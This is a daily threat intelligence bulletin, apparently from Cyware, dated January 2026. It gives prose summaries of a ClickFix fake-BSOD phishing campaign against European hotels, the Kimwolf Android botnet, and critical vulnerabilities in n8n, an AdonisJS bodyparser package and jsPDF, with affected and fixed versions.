Cyware Daily Threat Intelligence, January 06, 2026

The hospitality sector is checking into a digital nightmare. A new ClickFix campaign is targeting European hotels with phishing emails. When victims visit the fraudulent site, they are hit with a realistic fake BSOD that tricks them into running a PowerShell command to "fix" the error, unknowingly installing the DCRAT malware.

Your Android TV might be working a second job for cybercriminals. The Kimwolf botnet has enslaved over 2 million Android devices by exploiting exposed debug ports (ADB) to build a massive residential proxy network.

A popular automation tool has a near-perfect flaw that puts host machines at risk. A critical vulnerability (CVE-2025-68668) in the open-source n8n platform allows authenticated users to execute arbitrary system commands, earning it a severity score of 9.9.

Top Malware Reported in the Last 24 Hours

ClickFix attack uses fake BSOD screens

A new ClickFix social engineering campaign targets the hospitality sector in Europe, utilizing fake Windows Blue Screen of Death (BSOD) screens to deceive users into executing malware. The attack begins with phishing emails impersonating Booking[.]com, claiming a significant refund due to a guest's reservation cancellation, which creates urgency. Victims are directed to a counterfeit Booking.com website that mimics the original and displays a fake error message. Clicking the refresh button triggers a full-screen fake BSOD, prompting users to run a malicious PowerShell command. This command downloads and compiles DCRAT, allowing attackers to gain control over the infected systems. Once established, the malware can steal data, spread throughout networks, and deploy additional payloads, such as cryptocurrency miners, further compromising the target's security.

Kimwolf botnet infects over 2 million devices

The Kimwolf botnet has infected over 2 million Android devices by exploiting exposed Android Debug Bridge (ADB) services and residential proxy networks. Active since at least August 2025, this botnet is identified as an Android variant of AISURU and is linked to record-breaking DDoS attacks. Most infections are concentrated in Vietnam, Brazil, India, and Saudi Arabia, with approximately 67% of the compromised devices having ADB enabled by default. Many of these devices are thought to be pre-infected with software development kits (SDKs) from proxy providers. The botnet monetizes its operations by selling residential proxy bandwidth and utilizing the Byteconnect SDK for bandwidth monetization, allowing compromised devices to execute proxy tasks. 

Top Vulnerabilities Reported in the Last 24 Hours

New n8n bug allows system command execution

A critical security vulnerability has been discovered in n8n, an open-source workflow automation platform, allowing authenticated users to execute arbitrary system commands on the host machine. This vulnerability, tracked as CVE-2025-68668 and rated 9.9 on the CVSS scoring system, affects versions from 1.0.0 to 1.111.0. It arises from a failure in the protection mechanism of the Python Code Node that utilizes Pyodide. The issue enables users with permissions to create or modify workflows to exploit the flaw and run commands with the same privileges as the n8n process. The vulnerability has been addressed in n8n version 2.0.0, which introduces a task runner-based native Python implementation for enhanced security. 

Critical vulnerabilities found in npm packages

A critical vulnerability in the "@adonisjs/bodyparser" npm package, tracked as CVE-2026-21440 with a CVSS score of 9.2, has been disclosed, allowing remote attackers to write arbitrary files on servers through a path traversal issue in the MultipartFile.move() function. This flaw affects AdonisJS versions up to 10.1.1 and 11.0.0-next.5, with fixes implemented in subsequent releases. Exploitation of this vulnerability could potentially lead to remote code execution if attackers overwrite sensitive files. Concurrently, another serious vulnerability in the jsPDF npm package, identified as CVE-2025-68428, also scored 9.2 on the CVSS scale, enabling attackers to access unsanitized paths and retrieve arbitrary file contents. This vulnerability has been addressed in version 4.0.0 of jsPDF.